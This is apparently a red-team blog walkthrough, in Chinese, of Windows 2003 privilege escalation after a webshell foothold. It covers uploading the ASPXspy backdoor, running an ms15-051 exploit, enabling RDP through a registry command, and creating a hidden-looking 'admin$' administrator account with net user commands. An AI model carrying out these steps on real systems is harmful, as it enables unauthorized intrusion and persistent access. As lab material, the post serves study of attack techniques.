Windows 本地提權/滲透紀錄
作者 : Noth
前言 :
對於紅隊一員來說,當拿到 Webshell 權限時遠遠還不夠,接下來必須要根據系統相對應的漏洞進行提權,筆者當初提權也搞不是很清楚,提權可以分成兩個部分來說,Windows、Linux 主機進行提權,這篇主要介紹的是 Windows 主機提權 !
實驗環境 :
Windows 2003
IIS Server + Aspx
先前條件 :
已經先拿到 Webshell,通過一句話連接或傳大馬(這邊使用ASPXspy)
實作流程 :
上傳ASPXspy後門到Server並訪問
查看權限 cmdshell :
whoami
找上傳點(目錄可執行) :
C:\Windows\Temp
C:\windows\tasks
C:\windows\assembly
C:\RECYCLER\
上傳提權工具
ms15-051.exe :
回到 CmdShell 執行命令查看是否提權(成功提權) :
查看開放端口 netstat -ano (沒有開放3389) :
創建一個 1.bat 檔案進行打開 3389 Port :
上傳到 C:\Windows\Temp 中去執行
內容 : REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
再次查看 netstat -ano :
3389 port 成功開啟
新建一個新用戶到管理組 :
net user admin$ 1qaz@WSX /add
net localgroup administrators admin$ /add
net localgroup administrators
留言
張貼留言